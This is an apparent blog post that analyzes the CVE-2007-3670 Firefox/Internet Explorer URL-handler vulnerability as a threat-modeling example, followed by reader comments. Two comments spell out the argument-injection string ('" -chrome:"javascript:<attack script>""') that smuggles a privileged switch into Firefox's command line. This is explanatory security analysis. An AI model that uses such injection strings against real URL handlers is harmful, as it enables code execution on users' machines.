Threat Modeling Again, Threat Modeling in Practice

I've been writing a LOT about threat modeling recently but one of the things I haven't talked about is the practical value of the threat modeling process.

Here at Microsoft, we've totally drunk the threat modeling cool-aid.  One of Adam Shostak's papers on threat modeling has the following quote from Michael Howard:

"If we had our hands tied behind our backs (we don't) and could do only one thing to improve software security... we would do threat modeling every day of the week."

I want to talk about a real-world example of a security problem where threat modeling would have hopefully avoided a potential problem.

I happen to love this problem, because it does a really good job of showing how the evolution of complicated systems can introduce unexpected security problems.  The particular issue I'm talking about is known as CVE-2007-3670.  I seriously recommend people go to the CVE site and read the references to the problem, they provide a excellent background on the problem.

CVE-2007-3670 describes a vulnerability in the Mozilla Firefox browser that uses Internet Explorer as an exploit vector. There's been a TON written about this particular issue (see the references on the CVE page for most of the discussion), I don't want to go into the pros and cons of whether or not this is an IE or a FireFox bug.  I only want to discuss this particular issue from a threat modeling standpoint.

There are four components involved in this vulnerability, each with their own threat model:

  • The Firefox browser.
  • Internet Explorer.
  • The "firefoxurl:" URI registration.
  • The Windows Shell (explorer).

Each of the components in question play a part in the vulnerability.  Let's take them in turn.

  • The Firefox browser provides a command line argument "-chrome" which allows you to load the chrome specified at a particular location.
  • Internet Explorer provides an extensibility mechanism which allows 3rd parties to register specific URI handlers.
  • The "firefoxurl:" URL registration, which uses the simplest form of URL handler registration which simply instructs the shell to execute "<firefoxpath>\firefox.exe -url "%1" -requestPending".  Apparently this was added to Firefox to allow web site authors to force the user to use Firefox when viewing a link.  I believe the "-url" switch (which isn't included in the list of firefox command line arguments above) instructs firefox to treat the contents of %1 as a URL.
  • The Windows Shell which passes on the command line to the firefox application.

I'm going to attempt to draw the relevant part of the diagrams for IE and Firefox.  These are just my interpretations of what is happening, it's entirely possible that the dataflow is different in real life.



This diagram shows the flow of control from the user into Firefox (remember: I'm JUST diagramming a small part of the actual component diagram).  One of the things that makes Firefox's chrome engine so attractive is that it's easy to modify the chrome because the Firefox chrome is simply javascript.  Since the javascript being run runs with the same privileges as the current user, this isn't a big deal - there's no opportunity for elevation of privilege there.  But there is one important thing to remember here: Firefox has a security assumption that the -chrome command switch is only provided by the user - because it executes javascript with full trust, it's effectively accepts executable code from the command line.


Internet Explorer:


This diagram describes my interpretation of how IE (actually urlmon.dll in this case) handles incoming URLs.  It's just my interpretation, based on the information contained here (at a minimum, I suspect it's missing some trust boundaries).  The web page hands IE a URL, IE looks the URL up in the registry and retrieves a URL handler.  Depending on how the URL handler was registered, IE either invokes the shell on the path portion of the URL, or, if the URL handler was registered as an async protocol hander, it hands the URL to the async protocol handler.

I'm not going to do a diagram for the firefoxurl handler or the shell, since they're either not interesting or are covered in the diagram above - in the firefoxurl handler case, the firefoxurl handler is registered as being handled by the shell.  In that case,  Internet Explorer will pass the URL into the shell, which will happily pass it onto the URL handler (which, in this case is FireFox).


That's a lot of text and pictures, tomorrow I'll discuss what I think went wrong and how using threat modeling could have avoided the issue.  I also want to look at BOTH of the threat models and see what they indicate.


Obviously, the contents of this post are my own opinion and in no way reflect the opinions of Microsoft.

Comments (11)

  1. Anonymous says:

    > I’m going to attempt to draw the relevant part of the

    > diagrams for IE and Firefox.

    But then the first diagram asserts that the user is passing a command line to Firefox.  This ambiguity is exactly part of the cause of the security problem.  The model needs to show that the command line is coming from unknown origins via an untrusted application into Firefox.  (As a side effect, that will make it clearer where validation needs to be performed, and why.)

    > Since the javascript being run runs with the same privileges

    > as the current user, this isn’t a big deal

    If it’s unclear where the Javascript came from and whether the user approved it, then it is a big deal.  Low-integrity operations in Vista’s Internet Explorer should be a big help.  Low-integrity operations in other applications should be an equally big help.

    > Firefox has a security assumption

    Yup, a big mistake.

  2. Norman, the threat model DOES show that – there’s a trust boundary between the user and Firefox.

    What’s not clear is what level of validation needs to be done to ensure that the command line is safe.

  3. Anonymous says:

    This is actually a very cool example to use with the threat modelling discussion that you’ve had going the last little while.  I look forward to the rest of it.

    Not to get into the muck of this being an IE vs Firefox flaw, but I did find this humorous:

    [Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data."]

    I’m no expert, but that sounds like a fancy way of saying "oh fine, we’ll do some validity checks before trusting and acting on arbitrary data".  They certainly are not preventing IE from doing anything, but rather taking responsibility for the actions Firefox chooses to perform.

    Anyway, good example.

  4. Anonymous says:

    LOL Nick.

    I run into that type of thinking all the time.  "Hey there is a problem in my software when this other application passes me stuff I don’t like."  Lets fix the other application.

    Sure, sometimes there is business value to doing that, but in the case of a security exploit, I would find if hard to justify.

    It will be interesting to see what Larry says.  This threat modeling is clicking a lot better with a real world example.  In fact, I have a better understanding of what the issue is now that I have seen the threat model.

  5. Tim, consider each diagram and think about what they say and what their assumptions are.

    Then consider how the introduction of the firefoxurl handler changes the assumptions under which the firefox command line handler operates.

  6. Mike Dimmick says:

    The issue is at least partly that IE or the Windows Shell decodes URL-encoded (%xx) characters before passing them to the URL handler. This allows the attacker to insert (literally)

    " -chrome:"<attackscript>

    into the command line of Firefox.

    My solution would be to add an extra option -firefoxurl at the beginning of the command arguments, where this argument then suppresses any full-trust elements. Alternatively, replace the non-cohesive simple URL handler with a proper async URL handler, which will get the URL as an argument to a function call. One of Firefox’s problems is that it isn’t really designed as a Windows app – there are places where they use TCP sockets for inter-thread communication, in lieu of Unix-domain sockets. (Or, at least, they did a year ago – I don’t keep up with Firefox).

    The encoded parts of the URL probably shouldn’t be decoded by IE/Shell before passing to other components, but I’m not an expert on URL parsing, and this will have a potential compatibility impact on any other URL handler. That said, decoding %2f to / (for example) changes the meaning of the URL. The only reason I can think of to decode first is in case there are URL-encoded characters in the scheme part, but that’s not allowed in RFC 1738. It says (section 2.2):

    "On the other hand, characters that are not required to be encoded (including alphanumerics) may be encoded within the scheme-specific part of a URL, as long as they are not being used for a reserved purpose."

    (note "scheme-specific part", i.e. the part after the scheme). The BNF in RFC 2396 (which supersedes 1738) does not permit encoded characters at this point either.

  7. Anonymous says:

    Larray: It’s not just IE, but QT too.  See CVE-2006-4965 for more info on the QT/Fx bug.

  8. Mike, that’s not quite true.  The attacker actually inserted:

     " -chrome:"javascript:<attack script>""

    The first " terminated the -url command line, which opened up the -chrome switch.  Their fix was to have firefox treat everything on the command line after the -url switch as a URL.

    More on this in my next post.

  9. Anonymous says:

    Yesterday I presented my version of the diagrams for Firefox’s command line handler and the IE/URLMON’s

  10. Anonymous says:

    > there’s a trust boundary between the user and Firefox

    I understand it shows a trust boundary, but it’s still playing with ambiguities by calling one side the user.  That ambiguity is really part of the problem.  If the user really asked for the operation then the user should be trusted, the same as when the user clicks "continue" on a UAC prompt.  When the requestor is really some unverified participant of unknown origin, we should not assume that the requestor is the user and the trust boundary should be fortified.

    Of course very few users will be able to answer properly when a fortified Firefox asks "do you really want to invoke this url: -chrome:blahblahblah" or "do you really want to invoke this chrome: blahblahblah".  But it would still be better to force the question to be asked, than to blindly obey the url.

  11. Anonymous says:

    I want to wrap up the threat modeling posts with a summary and some comments on the entire process. Yeah,

Skip to main content